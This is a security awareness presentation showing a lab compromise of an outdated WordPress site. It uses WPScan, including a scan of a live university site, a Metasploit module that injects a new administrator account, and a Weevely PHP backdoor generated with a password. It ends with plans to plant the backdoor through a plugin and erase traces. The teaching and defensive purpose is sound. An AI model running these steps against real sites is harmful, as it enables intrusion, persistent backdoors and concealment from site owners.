Attacking WordPress

  • I am a system administrator and programmer who develops web applications and I support High Performance Research Computing at the University of Michigan.
  • In my previous job, I was in charge of the main central web infrastructure for the University of Michigan for 5 years, including providing hosting for WordPress sites at U-M.
  • 19 years of experience dealing with computer security compromises / break-ins.
  • 11 years of experience dealing with web application security compromises / break-ins, including WordPress.

I am not:

  • A security expert (much more knowledgeable than me).
  • A bad guy (much more capable than me, with access to “bad guy tools”).

This presentation could be much scarier if done by either a security expert or a bad guy.

This presentation is an updated but significantly cut down version of a presentation I gave for WordPress Ann Arbor in January 2014. Please see that presentation for more details, especially about what types of bad guys there are, what motivates them, and how to protect your WordPress sites.

Both security experts and bad guys will have much more time and focus than a generalist such as I am.

Bad guys have access to malware, including very sophisticated toolkits to compromise web sites, “black hat” forums, and more. Toolkits and exploits are routinely bought and sold for Bitcoin or dollars on black market sites.

This presentation uses only “good guy tools” because I don’t want to use untrustworthy software or wind up on some law enforcement agency’s list.

The previous presentation exploited a PHP code injection vulnerability in the W3 Total Cache plugin and started a command shell on the web server. Today’s presentation will instead exploit a SQL query injection vulnerability to add a new administrative user to the WordPress site via the database.

The purpose of this presentation is to show how easy it can be to take control of a WordPress site that is not kept up to date, in order to help motivate you to keep your own WordPress sites up to date and secure.

Everything we show in this presentation is fairly basic, widely available on the Internet, and easily findable with normal web searches. This presentation does not cover any expert or advanced techniques.

Still, using anything from this presentation without authorization against sites or computers that do not belong to you is illegal and likely carries severe penalties. Don’t do it.

  • WordPress 4.0 (latest version as of the time of this presentation).
    • Plugin: Custom Contact Forms version 5.1.0.3 (one version older than the current release).

      “A customizable and intuitive contact form plugin for WordPress.”
      Downloaded over 641,000 times. Rated 3.8 out of 5 stars.

      Note! Version 5.1.0.3 has a security problem! The current version, released August 4, 2014, is 5.1.0.4.

  • Running on Ubuntu Server 14.04.1 LTS 64 bit (current LTS release), fully patched and updated.

Everything was set up according to the instructions at wordpress.org and ubuntu.com. The only extra thing that was done was to turn on SSH to allow command-line administration.

We’re using Ubuntu Server LTS because it is the most popular choice for people who run their own server.

badguy2.catseye.org

Screen shot from the Kali Linux web page

The attacking system is running in a second virtual machine on my laptop, and, like the target, is not publicly accessible.

We’re using the latest release: Kali Linux 1.0.9, which is based on Debian 7 “Wheezy”.

Kali Linux, http://www.kali.org/

  • A “good guy” tool that lets companies test their own networks for security problems.
  • It’s actually a collection of over 300 security tools, including tools to test security as well as forensic tools to recover from attacks.
  • It is a complete Linux system that can either be run as a “Live CD” or installed onto a computer.
  • We’re using it because it is the quickest, easiest way to launch our attack: download, boot, attack.

We’re actually going to use only three of the tools Kali Linux provides:

  • WPScan: Finds security problems on WordPress sites and performs brute-force discovery of WordPress usernames and passwords.
  • Metasploit: A very sophisticated security testing framework that includes a web interface to let us launch attacks without needing in-depth technical expertise.
  • Weevely: A “PHP web shell” that, when uploaded to a site, allows backdoor access and (potentially) full control of the web server.

Instead of using Kali Linux, we could just download and install WPScan, Metasploit, and Weevely. This requires only a tiny bit more technical knowledge than using Kali Linux does, plus a bit more configuration work, and is very doable. We’re just being extra lazy.

To find out how to use WPScan, run it with the --help option:

root@badguy2: ~# wpscan --help
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.5.1
     Sponsored by the RandomStorm Open Source Initiative
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

Help :

Some values are settable in a config file, see the example.conf.json

--update                            Update to the database to the latest version.
--url       | -u        The WordPress URL/domain to scan.
--force     | -f                    Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)]        Enumeration.
  option :
    u        usernames from id 1 to 10
    u[10-20] usernames from id 10 to 20 (you must write [] chars)
    p        plugins
    vp       only vulnerable plugins
    ap       all plugins (can take a long time)
    tt       timthumbs
    t        themes
    vt       only vulnerable themes
    at       all themes (can take a long time)
  Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins
  If no option is supplied, the default is "vt,tt,u,vp"

--exclude-content-based ""
                                    Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied.
                                    You do not need to provide the regexp delimiters, but you must write the quotes (simple or double).
--config-file  | -c    Use the specified config file, see the example.conf.json.
--user-agent   | -a     Use the specified User-Agent.
--cookie                    String to read cookies from.
--random-agent | -r                 Use a random User-Agent.
--follow-redirection                If the target url has a redirection, it will be followed without asking if you wanted to do so or not
--batch                             Never ask for user input, use the default behaviour.
--no-color                          Do not use colors in the output.
--wp-content-dir    WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it.
                                    Subdirectories are allowed.
--wp-plugins-dir    Same thing than --wp-content-dir but for the plugins directory.
                                    If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
--proxy     Supply a proxy. HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported.
                                    If no protocol is given (format host:port), HTTP will be used.
--proxy-auth     Supply the proxy login credentials.
--basic-auth     Set the HTTP Basic authentication.
--wordlist | -w           Supply a wordlist for the password bruter and do the brute.
--username | -U           Only brute force the supplied username.
--threads  | -t  The number of threads to use when multi-threading requests.
--cache-ttl              Typhoeus cache TTL.
--request-timeout  Request Timeout.
--connect-timeout  Connect Timeout.
--max-threads          Maximum Threads.
--help     | -h                     This help screen.
--verbose  | -v                     Verbose output.


Examples :

-Further help ...
ruby ./wpscan.rb --help

-Do 'non-intrusive' checks ...
ruby ./wpscan.rb --url www.example.com

-Do wordlist password brute force on enumerated users using 50 threads ...
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50

-Do wordlist password brute force on the 'admin' username only ...
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin

-Enumerate installed plugins ...
ruby ./wpscan.rb --url www.example.com --enumerate p

-Enumerate installed themes ...
ruby ./wpscan.rb --url www.example.com --enumerate t

-Enumerate users ...
ruby ./wpscan.rb --url www.example.com --enumerate u

-Enumerate installed timthumbs ...
ruby ./wpscan.rb --url www.example.com --enumerate tt

-Use a HTTP proxy ...
ruby ./wpscan.rb --url www.example.com --proxy 127.0.0.1:8118

-Use a SOCKS5 proxy ... (cURL >= v7.21.7 needed)
ruby ./wpscan.rb --url www.example.com --proxy socks5://127.0.0.1:9000

-Use custom content directory ...
ruby ./wpscan.rb -u www.example.com --wp-content-dir custom-content

-Use custom plugins directory ...
ruby ./wpscan.rb -u www.example.com --wp-plugins-dir wp-content/custom-plugins

-Update the DB ...
ruby ./wpscan.rb --update

-Debug output ...
ruby ./wpscan.rb --url www.example.com --debug-output 2>debug.log

See README for further information.

root@badguy2: ~# 



Let’s look at http://arc.research.umich.edu/

root@badguy2: ~# wpscan --url arc.research.umich.edu
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.5.1
     Sponsored by the RandomStorm Open Source Initiative
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://arc.research.umich.edu/
[+] Started: Thu Oct  2 21:32:30 2014

[+] robots.txt available under: 'http://arc.research.umich.edu/robots.txt'
[!] The WordPress 'http://arc.research.umich.edu/readme.html' file exists
[+] Interesting header: LINK: ; rel=shortlink
[+] Interesting header: SERVER: Apache
[+] XML-RPC Interface available under: http://arc.research.umich.edu/xmlrpc.php
[!] Upload directory has directory listing enabled: http://arc.research.umich.edu/wp-content/uploads/

[+] WordPress version 3.8.1 identified from meta generator
[!] 9 vulnerabilities identified from the version number

[!] Title: WordPress 1.0 - 3.8.1 administrator exploitable blind SQLi
    Reference: https://wpvulndb.com/vulnerabilities/5963
    Reference: https://security.dxw.com/advisories/sqli-in-wordpress-3-6-1/

[!] Title: WordPress 3.7.1 & 3.8.1 Potential Authentication Cookie Forgery
    Reference: https://wpvulndb.com/vulnerabilities/5964
    Reference: https://labs.mwrinfosecurity.com/blog/2014/04/11/wordpress-auth-cookie-forgery/
    Reference: https://github.com/WordPress/WordPress/commit/78a915e0e5927cf413aa6c2cef2fca3dc587f8be
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0166
    Reference: http://osvdb.org/105620
[i] Fixed in: 3.8.2

[!] Title: WordPress 3.7.1 & 3.8.1 Privilege escalation: contributors publishing posts
    Reference: https://wpvulndb.com/vulnerabilities/5965
    Reference: https://github.com/wpscanteam/wpscan/wiki/CVE-2014-0165
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0165
    Reference: http://osvdb.org/105630
[i] Fixed in: 3.8.2

[!] Title: WordPress Plupload Unspecified XSS
    Reference: https://wpvulndb.com/vulnerabilities/5966
    Reference: https://secunia.com/advisories/57769
    Reference: http://osvdb.org/105622
[i] Fixed in: 3.8.2

[!] Title: WordPress 3.5 - 3.7.1 XML-RPC DoS
    Reference: https://wpvulndb.com/vulnerabilities/7526
    Reference: http://wordpress.org/news/2014/08/wordpress-3-9-2/
    Reference: http://mashable.com/2014/08/06/wordpress-xml-blowup-dos/
    Reference: http://www.breaksec.com/?p=6362
    Reference: http://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
[i] Fixed in: 3.9.2

[!] Title: WordPress 2.0.3 - 3.9.1 (except 3.7.4 / 3.8.4) CSRF Token Brute Forcing
    Reference: https://wpvulndb.com/vulnerabilities/7528
    Reference: https://core.trac.wordpress.org/changeset/29384
    Reference: https://core.trac.wordpress.org/changeset/29408
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5204
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5205
[i] Fixed in: 3.9.2

[!] Title: WordPress 3.0 - 3.9.1 Authenticated Cross-Site Scripting (XSS) in Multisite
    Reference: https://wpvulndb.com/vulnerabilities/7529
    Reference: https://core.trac.wordpress.org/changeset/29398
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5240
[i] Fixed in: 3.9.2

[!] Title: WordPress 3.6 - 3.9.1 XXE in GetID3 Library
    Reference: https://wpvulndb.com/vulnerabilities/7530
    Reference: https://github.com/JamesHeinrich/getID3/commit/dc8549079a24bb0619b6124ef2df767704f8d0bc
    Reference: http://getid3.sourceforge.net/
    Reference: http://wordpress.org/news/2014/08/wordpress-3-9-2/
    Reference: http://lab.onsec.ru/2014/09/wordpress-392-xxe-through-media-upload.html
    Reference: https://github.com/ONsec-Lab/scripts/blob/master/getid3-xxe.wav
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2053
[i] Fixed in: 3.9.2

[!] Title: WordPress 3.4.2 - 3.9.2 Does Not Invalidate Sessions Upon Logout
    Reference: https://wpvulndb.com/vulnerabilities/7531
    Reference: http://whiteoaksecurity.com/blog/2012/12/17/cve-2012-5868-wordpress-342-sessions-not-terminated-upon-explicit-user-logout
    Reference: http://blog.spiderlabs.com/2014/09/leveraging-lfi-to-get-full-compromise-on-wordpress-sites.html
    Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5868
[i] Fixed in: 4.0

[+] WordPress theme in use: orci - v0.1.0

[+] Name: orci - v0.1.0
 |  Location: http://arc.research.umich.edu/wp-content/themes/orci/
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/themes/orci/
 |  Style URL: http://arc.research.umich.edu/wp-content/themes/orci/style.css
 |  Theme Name: ORCI
 |  Theme URI: http://orci.research.umich.edu/
 |  Description: Child theme for the Twenty Eleven theme
 |  Author: John Pariseau
 |  Author URI: http://example.com/about/

[+] Detected parent theme: twentyeleven - v1.7

[+] Name: twentyeleven - v1.7
 |  Location: http://arc.research.umich.edu/wp-content/themes/twentyeleven/
 |  Readme: http://arc.research.umich.edu/wp-content/themes/twentyeleven/readme.txt
 |  Style URL: http://arc.research.umich.edu/wp-content/themes/twentyeleven/style.css
 |  Theme Name: Twenty Eleven
 |  Theme URI: http://wordpress.org/themes/twentyeleven
 |  Description: The 2011 theme for WordPress is sophisticated, lightweight, and adaptable. Make it yours with a c...
 |  Author: the WordPress team
 |  Author URI: http://wordpress.org/

[+] Enumerating plugins from passive detection ...
 | 8 plugins found:

[+] Name: contact-form-7 - v3.9.3
 |  Location: http://arc.research.umich.edu/wp-content/plugins/contact-form-7/
 |  Readme: http://arc.research.umich.edu/wp-content/plugins/contact-form-7/readme.txt
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/plugins/contact-form-7/

[!] Title: Contact Form 7 & Old WP Versions - Crafted File Extension Upload Remote Code Execution
    Reference: https://wpvulndb.com/vulnerabilities/7021
    Reference: http://packetstormsecurity.com/files/125018/
    Reference: http://seclists.org/fulldisclosure/2014/Feb/0
    Reference: http://osvdb.org/102776

[+] Name: jquery-collapse-o-matic - v1.5.7
 |  Location: http://arc.research.umich.edu/wp-content/plugins/jquery-collapse-o-matic/
 |  Readme: http://arc.research.umich.edu/wp-content/plugins/jquery-collapse-o-matic/readme.txt
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/plugins/jquery-collapse-o-matic/

[+] Name: jquery-colorbox - v4.6
 |  Location: http://arc.research.umich.edu/wp-content/plugins/jquery-colorbox/
 |  Readme: http://arc.research.umich.edu/wp-content/plugins/jquery-colorbox/readme.txt
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/plugins/jquery-colorbox/

[+] Name: mailchimp - v1.4.1
 |  Location: http://arc.research.umich.edu/wp-content/plugins/mailchimp/
 |  Readme: http://arc.research.umich.edu/wp-content/plugins/mailchimp/readme.txt
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/plugins/mailchimp/

[+] Name: page-list - v4.2
 |  Location: http://arc.research.umich.edu/wp-content/plugins/page-list/
 |  Readme: http://arc.research.umich.edu/wp-content/plugins/page-list/readme.txt
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/plugins/page-list/

[+] Name: social - v2.11
 |  Location: http://arc.research.umich.edu/wp-content/plugins/social/
 |  Readme: http://arc.research.umich.edu/wp-content/plugins/social/README.txt
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/plugins/social/

[+] Name: wp-paginate - v1.2.4
 |  Location: http://arc.research.umich.edu/wp-content/plugins/wp-paginate/
 |  Readme: http://arc.research.umich.edu/wp-content/plugins/wp-paginate/readme.txt
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/plugins/wp-paginate/

[+] Name: youtube-shortcode - v1.8.5
 |  Location: http://arc.research.umich.edu/wp-content/plugins/youtube-shortcode/
 |  Readme: http://arc.research.umich.edu/wp-content/plugins/youtube-shortcode/readme.txt
[!] Directory listing is enabled: http://arc.research.umich.edu/wp-content/plugins/youtube-shortcode/

[+] Finished: Thu Oct  2 21:34:06 2014
[+] Memory used: 5.469 MB
[+] Elapsed time: 00:01:36
root@badguy2: ~# 



This is a WordPress site I use a lot at work.

WPScan can tell that the server runs Apache, but not what version.

The #1 way to keep people from breaking into your site is to always keep up to date with the latest versions of everything, yet this site is still running WordPress 3.8.1. That’s very bad; unfortunately, it’s not uncommon.

WPScan found nine security vulnerabilities. Many are probably not anything that would be useful to the casual attacker, but some might be. Read the details at each of the reference URLs that WPScan provides to find out more.
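To triage a report like the one above, each finding can be paired with the release that fixes it. The following is a minimal Python sketch and not part of WPScan: the helper names (`parse_findings`, `minimum_safe_version`) are our own, the sample text is a trimmed excerpt of the output shown earlier, and the parsing assumes the plain-text layout printed by WPScan 2.5.1, which may differ in other versions.

```python
SAMPLE_REPORT = """\
[!] Title: WordPress 3.7.1 & 3.8.1 Potential Authentication Cookie Forgery
    Reference: https://wpvulndb.com/vulnerabilities/5964
[i] Fixed in: 3.8.2

[!] Title: WordPress 3.5 - 3.7.1 XML-RPC DoS
    Reference: https://wpvulndb.com/vulnerabilities/7526
[i] Fixed in: 3.9.2

[!] Title: WordPress 3.4.2 - 3.9.2 Does Not Invalidate Sessions Upon Logout
    Reference: https://wpvulndb.com/vulnerabilities/7531
[i] Fixed in: 4.0
"""

TITLE_PREFIX = "[!] Title:"
FIXED_PREFIX = "[i] Fixed in:"


def parse_findings(report):
    """Return (title, fixed_in) pairs; fixed_in is None when no fix is listed."""
    findings = []
    for raw_line in report.splitlines():
        line = raw_line.strip()
        if line.startswith(TITLE_PREFIX):
            findings.append([line[len(TITLE_PREFIX):].strip(), None])
        elif line.startswith(FIXED_PREFIX) and findings:
            # A "Fixed in" line belongs to the most recent title above it.
            findings[-1][1] = line[len(FIXED_PREFIX):].strip()
    return [tuple(finding) for finding in findings]


def version_key(version):
    """Turn '3.9.2' into (3, 9, 2) so versions compare numerically."""
    return tuple(int(part) for part in version.split("."))


def minimum_safe_version(findings):
    """Highest 'Fixed in' release among the findings, or None if none listed."""
    fixed = [fixed_in for _, fixed_in in findings if fixed_in]
    return max(fixed, key=version_key) if fixed else None


findings = parse_findings(SAMPLE_REPORT)
for title, fixed_in in findings:
    print(f"{fixed_in or 'no fix listed':>14}  {title}")
print("Upgrade to at least:", minimum_safe_version(findings))
```

For this excerpt the last line reports 4.0, which matches the release WPScan lists as fixing the most recent issue.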

WPScan found one theme (“orci”, which it can tell is a child theme of Twenty Eleven), and eight plugins. There are likely more, which could be found by running WPScan with an exhaustive plugin search (“wpscan --enumerate ap”).

Note the web server configuration that permits the content of many directories to be listed — this is potentially very useful to an attacker.
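A site owner can check their own pages for this problem. The sketch below is a rough heuristic in Python, assuming the server produces Apache-style automatic index pages whose title starts with "Index of /"; other servers or customized listings will not match. The function names are our own, and `url_lists_directory` is defined but not called here because it makes a network request and should only be pointed at sites you are authorized to test.

```python
import re
import urllib.request

# Apache's automatic index pages carry a title such as "Index of /wp-content/uploads".
INDEX_TITLE = re.compile(r"<title>\s*Index of /", re.IGNORECASE)


def looks_like_directory_listing(html):
    """Heuristic: does this HTML look like an auto-generated directory index?"""
    return bool(INDEX_TITLE.search(html))


def url_lists_directory(url, timeout=10):
    """Fetch a URL on a site you own and apply the heuristic to the response."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as response:
            body = response.read().decode("utf-8", errors="replace")
    except OSError:
        # Covers HTTP errors (for example 403 Forbidden) and connection failures.
        return False
    return looks_like_directory_listing(body)


listing_page = "<html><head><title>Index of /wp-content/uploads</title></head></html>"
normal_page = "<html><head><title>My Blog</title></head></html>"
print(looks_like_directory_listing(listing_page))  # True
print(looks_like_directory_listing(normal_page))   # False
```

On Apache, listings are typically switched off with `Options -Indexes` in the server or directory configuration.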

If we wanted to attack this site, WPScan has given us a lot of potential avenues to explore.

Now, our intended target, http://myblog2.catseye.org/

Script started on Thu 02 Oct 2014 09:49:02 PM EDT
root@badguy2: ~# wpscan --url myblog2.catseye.org
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.5.1
     Sponsored by the RandomStorm Open Source Initiative
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://myblog2.catseye.org/
[+] Started: Thu Oct  2 21:49:18 2014

[!] The WordPress 'http://myblog2.catseye.org/readme.html' file exists
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.4
[+] XML-RPC Interface available under: http://myblog2.catseye.org/xmlrpc.php

[+] WordPress version 4.0 identified from meta generator

[+] WordPress theme in use: twentyfourteen - v1.2

[+] Name: twentyfourteen - v1.2
 |  Location: http://myblog2.catseye.org/wp-content/themes/twentyfourteen/
 |  Style URL: http://myblog2.catseye.org/wp-content/themes/twentyfourteen/style.css
 |  Theme Name: Twenty Fourteen
 |  Theme URI: http://wordpress.org/themes/twentyfourteen
 |  Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
 |  Author: the WordPress team
 |  Author URI: http://wordpress.org/

[+] Enumerating plugins from passive detection ...
 | 1 plugins found:

[+] Name: custom-contact-forms - v5.1.0.3
 |  Location: http://myblog2.catseye.org/wp-content/plugins/custom-contact-forms/
 |  Readme: http://myblog2.catseye.org/wp-content/plugins/custom-contact-forms/readme.txt
[!] Directory listing is enabled: http://myblog2.catseye.org/wp-content/plugins/custom-contact-forms/

[!] Title: Custom Contact Forms <= 5.0.0.1 - Cross Site Scripting
    Reference: https://wpvulndb.com/vulnerabilities/6296
    Reference: http://packetstormsecurity.com/files/112616/

[!] Title: Custom Contact Forms <= 5.1.0.3 Database Import/Export
    Reference: https://wpvulndb.com/vulnerabilities/7542
    Reference: http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html
    Reference: http://www.rapid7.com/db/modules/auxiliary/admin/http/wp_custom_contact_forms
[i] Fixed in: 5.1.0.4

[+] Finished: Thu Oct  2 21:49:21 2014
[+] Memory used: 2.191 MB
[+] Elapsed time: 00:00:03
root@badguy2: ~# exit



WPScan was not only able to tell what web server software is being used, but also the versions of both Apache HTTP Server and PHP.
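The version details come straight from the response headers, so a site owner can audit what their own server gives away. This is a minimal Python sketch with a hypothetical helper name (`leaky_headers`); it only inspects the two headers WPScan flagged above and assumes a version looks like a slash followed by dotted numbers.

```python
import re

# Matches product/version tokens such as "Apache/2.4.7" or "PHP/5.5.9-1ubuntu4.4".
VERSION_TOKEN = re.compile(r"/\d+(\.\d+)*")
WATCHED_HEADERS = ("server", "x-powered-by")


def leaky_headers(headers):
    """Return the watched headers whose values reveal a version number."""
    return {
        name: value
        for name, value in headers.items()
        if name.lower() in WATCHED_HEADERS and VERSION_TOKEN.search(value)
    }


# Header values taken from the two scans shown earlier.
target_headers = {"Server": "Apache/2.4.7 (Ubuntu)", "X-Powered-By": "PHP/5.5.9-1ubuntu4.4"}
quiet_headers = {"Server": "Apache"}

print(leaky_headers(target_headers))
print(leaky_headers(quiet_headers))  # {}
```

On a stock Apache and PHP setup, `ServerTokens Prod` and `expose_php = Off` are the usual settings for trimming these headers. Hiding versions does not fix a vulnerability, but it gives a casual attacker less to work with.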

WPScan found the Custom Contact Forms plugin and correctly noticed a database vulnerability in it.
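The check WPScan performs here boils down to comparing the installed version with the release that contains the fix. A minimal Python sketch of that comparison follows; the function names are our own, and it assumes purely numeric dotted versions like the ones in this scan (suffixes such as "-beta" would need extra handling).

```python
from itertools import zip_longest


def parse_version(version):
    """Split a dotted version such as '5.1.0.3' into a tuple of integers."""
    return tuple(int(part) for part in version.split("."))


def is_older(installed, fixed_in):
    """True when `installed` sorts strictly before `fixed_in`.

    Missing components count as zero, so '4.0' and '4.0.0' compare as equal.
    """
    pairs = zip_longest(parse_version(installed), parse_version(fixed_in), fillvalue=0)
    for have, need in pairs:
        if have != need:
            return have < need
    return False


print(is_older("5.1.0.3", "5.1.0.4"))  # True: the plugin on our target needs updating
print(is_older("5.1.0.4", "5.1.0.4"))  # False: the fixed release is installed
```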

Metasploit is available in four editions:

  • Metasploit Framework (free and open source, command line only)
  • Metasploit Community (free, includes web interface)
  • Metasploit Express, Metasploit Pro (commercial)

To run the Metasploit web interface under Kali Linux, type the following commands:

  service postgresql start
  service metasploit start

Wait a few minutes for Metasploit to start and create its databases, then go to http://badguy2.catseye.org:3790/

Everything we’re doing in this presentation can work with any of the editions. For this demo, we’re using Metasploit Community.

Basic steps:

  1. Create a Metasploit user account.
  2. Get and enter a license key (Community, Express, Pro editions).
  3. Create a project.
  4. Choose and run an exploit, breaking into the target’s site.
  5. Do what you want to the target’s site.

Steps 1 and 2 have already been done, so we’ll start with step 3.

A project is like a container that keeps track of systems that are being tested, and results of the tests.

Metasploit web interface – main page:

Screenshot of the Metasploit web interface main page

This is the page a user gets after they create a Metasploit user account, request and enter a product key, and log in.

Click on the New Project button to begin.

Creating a new project:

Screenshot of the Metasploit web interface New Project page

Just enter a name for the project and either the networks or IP addresses you’ll be testing and then click the Create Project button.

To speed things up, since we’re working with a single target, we’ll specify just its IP address instead of specifying a network range.

Project overview page:

Screenshot of the Metasploit web interface project overview page

Normally, we’d let Metasploit do a scan and then use the “Exploit” button to attempt to break into the sites that it found. But, since we know from WPScan that this site is running a vulnerable plugin, to save time, click on “Modules” in the top menu and select “Search…”. Then search for “wordpress”.

We’re actually using Metasploit here far below the level of complexity for which it is intended.

List of Metasploit WordPress exploit modules:

Screenshot of the list of Metasploit exploit modules for WordPress

Click on “WordPress custom-contact-forms Plugin SQL Upload”.

WordPress has a lot of vulnerabilities that are not listed here. If we’re interested in anything not shown, we can create a Metasploit module for it ourselves, or we could exploit it outside of Metasploit, either by hand or by using a different tool.

WordPress custom-contact-forms exploit module:

Screenshot of the Custom Contact Form exploit module options page

Although there are a lot of options that can be set, all we need to do is make sure that the IP address of our target system is correct and then click “Run Module”. Metasploit will then attempt to create a new administrator user for us on the target WordPress site.

To make everything fit on this slide, I’ve edited out the fields that normally show up in the “Module Options” section.

Running the exploit:

Screenshot of the successful exploit

That’s all there is to it! The WordPress site has now been compromised, and we should be able to log in as an administrator.

Note that the exploit module first determined the WordPress database table prefix, then uploaded SQL queries to create the administrator account.

Attacker logging in to WordPress using the credentials created by the successful exploit

The most effective way to make things harder for the attacker at this point is to have the login page not be accessible. For example, if the attacker is in Vietnam but the login page is only accessible from IP addresses in Ann Arbor, the attacker would need to use a VPN, use the vulnerability in CCF to steal session information from the WordPress database, or leverage another SQL-based avenue of attack.
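The idea of restricting the login page by address can be illustrated with Python's standard `ipaddress` module. This is only a sketch of the allowlist logic: the networks below are reserved documentation ranges standing in for "IP addresses in Ann Arbor", the function name is our own, and on a real site the restriction would normally be enforced in the web server or firewall configuration rather than in application code.

```python
import ipaddress

# Placeholder networks (reserved documentation ranges), not real campus addresses.
ALLOWED_NETWORKS = [
    ipaddress.ip_network("192.0.2.0/24"),
    ipaddress.ip_network("2001:db8::/32"),
]


def login_allowed(client_ip, networks=ALLOWED_NETWORKS):
    """True when the client address falls inside one of the allowed networks."""
    address = ipaddress.ip_address(client_ip)
    return any(address in network for network in networks)


print(login_allowed("192.0.2.17"))    # True: inside the allowed IPv4 range
print(login_allowed("203.0.113.5"))   # False: outside every allowed range
print(login_allowed("2001:db8::42"))  # True: inside the allowed IPv6 range
```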

Screenshot of the WordPress Users page, showing the new administrative user

As you can see, the user created by the exploit is an administrator and can do anything the owner of the blog can do via WordPress.

But, it’s pretty obvious that the compromise has taken place. If the real owner of the site checks, they’ll see our account, delete it, and probably upgrade everything.
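The owner's side of that check is easy to automate: keep a list of the administrators that are supposed to exist and compare it with the current list. A minimal Python sketch, with made-up usernames and a hypothetical helper name; how the current list is obtained (the Users page, a database query, or a command-line tool) is left open.

```python
def unexpected_admins(current_admins, known_admins):
    """Return administrator logins that are not in the known-good baseline."""
    return sorted(set(current_admins) - set(known_admins))


# Hypothetical data: the baseline the owner recorded, and what the site reports now.
known_admins = ["siteowner"]
current_admins = ["siteowner", "newadmin123"]

print(unexpected_admins(current_admins, known_admins))  # ['newadmin123']
```

Running a comparison like this on a schedule would surface an account like ours long before the owner happens to open the Users page.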

  • We could create or change some posts and hope that the owner of the site doesn’t notice. This could include adding SEO or links to other sites, or uploading drive-by attack kits to compromise the computers of anyone who visits the site. But we should probably assume that the owner of the site will notice, either sooner or later.
  • We could lock the owner out of the site by changing their password or just trashing the site, but they’d probably just regain control through their hosting provider and then restore from backup. (They keep regular, recent, verified-good backups of their entire WordPress site, right?)
  • Or, we could install a hidden back door that gives us full control of the server — right now we only have control of WordPress itself and can only do things that WordPress allows administrators to do — and then cover our tracks by deleting the administrator account we just created…
  • “Weevely is a stealth PHP web shell that provides a telnet-like console. It is an essential tool for web application post exploitation, and can be used as stealth backdoor.”
  • Weevely contains “More than 30 modules to automate administration and post exploitation tasks”.
  • A Weevely tutorial is available.
  • Weevely comes as a standard part of Kali Linux.
  • To create the backdoor code that you can then upload to a web server to gain stealth remote access to the web server, run the command weevely generate and give it the password you want to use to control access to the backdoor:

root@badguy2:~# weevely generate L3tM3In
[generate.php] Backdoor file 'weevely.php' created with password 'L3tM3In'
root@badguy2:~# 

There are dozens of other PHP shells and backdoors; we chose Weevely just because it was convenient and included with Kali Linux.

Here’s the obfuscated PHP code (weevely.php) that Weevely created for us to upload:


This is valid PHP code that accepts a command from the attacker, verifies the attacker’s password, and, if it checks out, runs the command.

If we put this weevely.php file in the main WordPress directory, then we’d be able to access our back door at http://myblog2.catseye.org/weevely.php (although we’d have to use Weevely to access it there; going there with a web browser will just show a blank page).

In addition to being obfuscated, the code has some random elements that are unique to each piece of code Weevely generates — this helps to prevent anti-virus software and other malware scanners from detecting the code once it is uploaded.

So how do we get the weevely.php file onto the target web server?

  • Thanks to the Metasploit exploit module, we have an administrator account on the WordPress site, and WordPress administrators can upload plugins containing .php files.
  • But a plugin that isn’t supposed to be present will be even more obvious than the administrator account that isn’t supposed to be there — people are more likely to look at their site’s plugins than their site’s users. And the owner of the site can just delete our backdoor-containing plugin.
  • So we upload a plugin that creates the backdoor when the plugin gets activated, and have the plugin put the backdoor outside of the plugin directory. Then we delete both the plugin and the administrator account ourselves to hide evidence that the WordPress site has been compromised.
